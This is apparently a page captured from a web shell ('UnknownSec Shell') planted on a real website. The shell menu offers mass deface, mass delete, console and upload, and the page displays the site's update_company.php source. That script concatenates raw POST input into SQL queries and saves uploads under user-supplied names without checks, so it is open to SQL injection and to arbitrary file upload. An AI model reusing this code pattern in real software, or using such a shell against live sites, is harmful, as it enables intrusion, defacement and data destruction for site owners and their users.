interiorvisions.co.th

upload mass deface mass delete console info server

name : update_company.php

<?php 

include('../config/config.php');


$title_com         = $_POST['com_title'];
$desc_com          = $_POST['com_desc'];

if(isset($_FILES['file']['tmp_name'])){
    $sql = "SELECT * FROM companys";
    $res = $conn->query($sql);
    while($row = $res->fetch_assoc()){
        $image = $row['ab_image'];
        @unlink("../".$image);
    }
    $images1 = $_FILES['file']['tmp_name'];
    $images_name1 = $_FILES['file']['name'];
    $images = "images/company/".$images_name1;
    move_uploaded_file($_FILES['file']['tmp_name'],"../images/company/".$_FILES["file"]["name"]);
    $sql = "update companys  SET  ab_title = '".$title_com ."',ab_desc = '".$desc_com."',ab_image = '".$images."' WHERE ab_id = 1";
}else{
    $sql = "update companys  SET  ab_title = '".$title_com ."',ab_desc = '".$desc_com."' WHERE ab_id = 1";
}

$res = $conn->query($sql);
if($res === TRUE ){
    echo 1;
}else{
    echo 0;
}
?>

UnknownSec Shell